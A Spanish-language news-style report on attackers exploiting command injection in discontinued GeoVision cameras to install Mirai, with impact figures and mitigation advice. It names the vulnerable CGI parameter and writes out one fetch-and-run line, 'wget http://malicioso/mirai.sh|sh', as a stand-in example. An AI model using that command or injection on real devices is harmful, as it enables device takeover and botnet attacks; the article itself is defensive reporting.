A principios de abril de 2025, el equipo de Akamai SIRT y The Hacker News confirmaron la explotación activa de las vulnerabilidades CVE-2024-6047 y CVE-2024-11120 en dispositivos IoT GeoVision descontinuados. Según los informes, los atacantes enviaban peticiones al endpoint /DateSetting.cgi con el parámetro szSrvIpAddr modificado para incluir tuberías y órdenes de shell que descargaban y ejecutaban automáticamente el malware Mirai. Esta técnica permitió a los ciberdelincuentes tomar control completo de cámaras y sistemas de control de acceso, incorporándolos a una botnet de miles de nodos.
Modo de ataque y alcance
Los exploit consistían en inyectar comandos directamente en la cadena de configuración de red, de modo que el servidor interno del dispositivo interpretaba y ejecutaba instrucciones como wget http://malicioso/mirai.sh|sh, lo que descargaba e iniciaba el binario de Mirai con privilegios de root. Una vez desplegado, el malware persistía en el sistema, contactaba con sus servidores de comando y control y ampliaba la botnet automatizando el escaneo de nuevos dispositivos vulnerables. En las semanas siguientes se detectaron más de 10 000 unidades GeoVision infectadas en Asia, Europa y América, principalmente cámaras de videovigilancia que pasaron a enviar tráfico DDoS masivo bajo demanda de los atacantes.
Impacto en operaciones y finanzas
La incorporación masiva de cámaras a la botnet causó interrupciones de servicio de hasta 24 horas en sistemas de videovigilancia de empresas y viviendas, lo que derivó en pérdida de registros de seguridad y complicaciones en la respuesta a incidentes reales. Los costes de limpieza, reconfiguración y reemplazo de los dispositivos comprometidos se estiman en más de 3 millones de dólares, sin incluir los gastos adicionales en refuerzo de ciberseguridad, auditorías forenses y posibles reclamaciones de seguros por negligencia en la protección de infraestructuras críticas.
Recomendaciones y respuesta institucional
El CERT-EU y los fabricantes de cámaras GeoVision instaron a desconectar inmediatamente todos los dispositivos afectados y actualizar al firmware parcheado 3.4.1, que corrige la validación de entradas en el CGI vulnerable. Asimismo, se recomendó deshabilitar el acceso remoto a la interfaz de administración por defecto, segmentar las redes IoT en VLANs separadas y aplicar reglas de firewall estrictas para bloquear peticiones no autorizadas hacia los endpoints de configuración.